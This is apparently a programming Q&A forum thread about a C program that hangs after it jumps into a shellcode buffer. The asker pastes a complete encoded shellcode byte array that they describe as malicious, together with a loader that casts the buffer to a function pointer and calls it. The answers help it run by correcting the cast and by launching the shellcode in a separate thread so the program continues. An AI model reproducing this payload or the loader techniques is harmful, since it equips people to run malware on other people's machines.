C program hangs / suspends while executing shellcode

Question

#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
    void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this");
    return 0;
}

While running the program, it executes the sptr() and hangs there, probably because of the shellcode is running in memory. printf("..") is never executed. My problem is I want the program to execute printf().

Please help :)

Reply to Eric Finn and Alvin Wong

I changed as what both of you instructed and the error I got is:

Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.

X:>"my program.exe" '»".¼' is not recognized as an internal or external command, operable program or batch file. must display this

char shellcode[] is valid. I have compiled it successfully before.

below is the original code with malicious shellcode so your antivirus should detect it, just to verify you guys that the shellcode is not the problem:

#include <stdio.h>
#include <stdlib.h>

char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";

int main (int argc, char **argv) {

void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this"); // instead of more lines i put this one
    return 0;
}

the above code compiles successfully and runs perfectly

i changed some lines to system(shellcode). it compiles but doesnt run properly

Answer 1

Okay, since shellcode is actually machine code rather than shell code (according to your latest edit), the answer is different.

When you declare char shellcode[] , shellcode is a pointer to a memory location. This means that instead of

sptr = (void(*)()) (&shellcode);

you should have

sptr = (void(*)()) (shellcode);

Additionally, you want the code to be in the executable part of your binary, rather than in the data part of the binary. That means you want char *shellcode = ... rather than char shellcode[] = ... .

Also, you should be sure that shellcode is a valid compiled C function with the same calling convention as the code that calls it.

Answer 2

As my understanding, you want to run some "machine code" ( not shellcode), and no matter how the code runs it should continue the program.

This is possible, by using threading.

First add these includes:

#include <windows.h>
#include <process.h>

And in your code:

void (*sptr)(void*);                  // Type for `_beginthread`
sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
_beginthread(sptr,0,NULL);            // This starts your code in a new thread
Sleep(5000);                          // Wait for 5000 ms
printf("must display this");

Of course this is not a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.

PS When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), and my antivirus didn't detect anything (do I need to switch to another one??), so you may need to review the code or add an exception handler...